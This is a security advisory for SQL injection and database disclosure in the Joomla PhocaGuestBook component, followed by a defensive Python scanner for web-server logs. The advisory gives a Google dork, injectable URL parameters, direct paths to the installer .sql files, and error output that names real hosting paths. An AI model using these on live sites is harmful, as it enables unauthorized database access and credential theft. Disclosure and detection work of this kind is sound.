- ####################################################################
- # Exploit Title : Joomla PhocaGuestBook 3.0.8 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : phoca.cz/phocaguestbook
- # Software Download Link : phoca.cz/download/category/5-phoca-guestbook-component
- github.com/PhocaCz/PhocaGuestbook/
- # Software Information Link : extensions.joomla.org/extension/phoca-guestbook/
- # Software Affected Versions : 1.4.5 - 1.5.3 - 2.0.2 - 2.0.7 - 3.0.2 - 3.0.5 - 3.0.6 - 3.0.8
- # Software Technical Requirements : Joomla! 1.5, Joomla! 2.5, Joomla! 3.x (stable or any later version)
- PHP 4, 5 (or any later version) with GD library (graphics library for CAPTCHA creation)
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_phocaguestbook''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Phoca Guestbook is a Joomla! CMS extension: a component that displays a
- guestbook and its entries on a website.
- It has anti-spam protection and can be used as a guestbook or as a
- contact form. The contact form is protected by anti-spam methods, and emails
- with the contact content can be sent to a selected user.
- ####################################################################
- # Impact :
- ***********
- * The Joomla PhocaGuestBook component, version 3.0.8 and other versions,
- is prone to an SQL injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This software is also prone to an information exposure / database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information, including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_phocaguestbook&view=[SQL Injection]
- /index.php?option=com_phocaguestbook&id=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=guestbooki&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&phocasid=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_phocaguestbook/install.sql
- /administrator/components/com_phocaguestbook/uninstall.sql
- /administrator/components/com_phocaguestbookinstall/sql/mysql/install.utf8.sql
- /administrator/components/com_phocaguestbookinstall/sql/mysql/uninstall.utf8.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Non-static method PhocaguestbookHelperFront::getDateFormat()
- should not be called statically, assuming $this from incompatible context in
- /var/www/vh196207/data/www/sch-33.ru/components/com_phocaguestbook
- /views/guestbook/view.html.php on line 64
- Warning: mysql_num_rows() expects parameter 1 to be resource, boolean
- given in /home/zdsevnica/public_html/libraries/joomla/database
- /database/mysql.php on line 345
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
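A defender-side check for the two request patterns listed above (the com_phocaguestbook query parameters and the installer .sql paths), run over web-server access logs. This is an added example, not part of the original advisory or of the Phoca project; the log format (Combined Log Format), the allowed value shapes in `EXPECTED`, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target and status code from a Combined Log Format entry.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+" (\d{3})')
# Installer SQL files under the component's administrator directory.
SQL_FILE = re.compile(r"/administrator/components/com_phocaguestbook[^/]*/.*\.sql$", re.I)
# Assumed shape of legitimate values for the parameters the advisory lists.
EXPECTED = {
    "view": re.compile(r"[A-Za-z0-9_]+"),
    "id": re.compile(r"\d+(:[\w-]+)?"),  # Joomla also uses "12:alias" slugs
    "Itemid": re.compile(r"\d+"),
    "limitstart": re.compile(r"\d+"),
    "phocasid": re.compile(r"\d+"),
}
# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_phocaguestbook&view=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [12/Feb/2019:10:00:09 +0000] "GET /administrator/components/com_phocaguestbook/install.sql HTTP/1.1" 200 2048',
    '192.0.2.10 - - [12/Feb/2019:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=1%27 HTTP/1.1" 200 100',
    '198.51.100.7 - - [12/Feb/2019:10:00:15 +0000] "GET /site/index.php?option=com_phocaguestbook&view=guestbooki&id=1&Itemid=482&phocasid=1%27 HTTP/1.1" 200 900',
]

def inspect(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = REQ.search(line)
    if not m:
        return []
    url, status = urlsplit(m.group(1)), m.group(2)
    findings = []
    if SQL_FILE.search(url.path):
        # A 200 here means the schema file was actually served to the client.
        findings.append(f"sql-file:{status}")
    query = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    if query.get("option") == ["com_phocaguestbook"]:
        for name, shape in EXPECTED.items():
            for value in query.get(name, []):
                if not shape.fullmatch(value):
                    findings.append(f"bad-param:{name}")
    return findings

def scan(lines):
    """Return (line number, findings) for every line with at least one finding."""
    results = [(n, inspect(line)) for n, line in enumerate(lines, 1)]
    return [(n, found) for n, found in results if found]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE_LOG):
        print(lineno, found)
```

A `sql-file:200` finding shows the web server is serving the component's .sql files; denying requests for `.sql` under `/administrator/components/` at the server level removes that exposure regardless of component version.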